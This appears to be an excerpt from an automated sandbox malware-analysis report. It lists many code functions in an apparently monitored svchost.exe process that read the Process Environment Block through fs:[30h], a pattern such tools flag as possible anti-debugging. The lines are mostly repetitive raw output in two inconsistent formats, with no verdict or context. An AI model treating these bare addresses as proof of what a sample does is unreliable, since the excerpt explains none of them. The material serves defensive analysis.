Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6273C mov eax/ecx, dword ptr fs:[00000030h] (3 occurrences: 2 eax, 1 ecx)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6674D mov esi/eax, dword ptr fs:[00000030h] (3 occurrences: 1 esi, 2 eax)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A6C7 mov ebx/eax, dword ptr fs:[00000030h] (2 occurrences: 1 ebx, 1 eax)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B32582 mov eax/ecx, dword ptr fs:[00000030h] (2 occurrences: 1 eax, 1 ecx)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]2_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]2_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]2_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]2_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]2_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]2_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]2_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
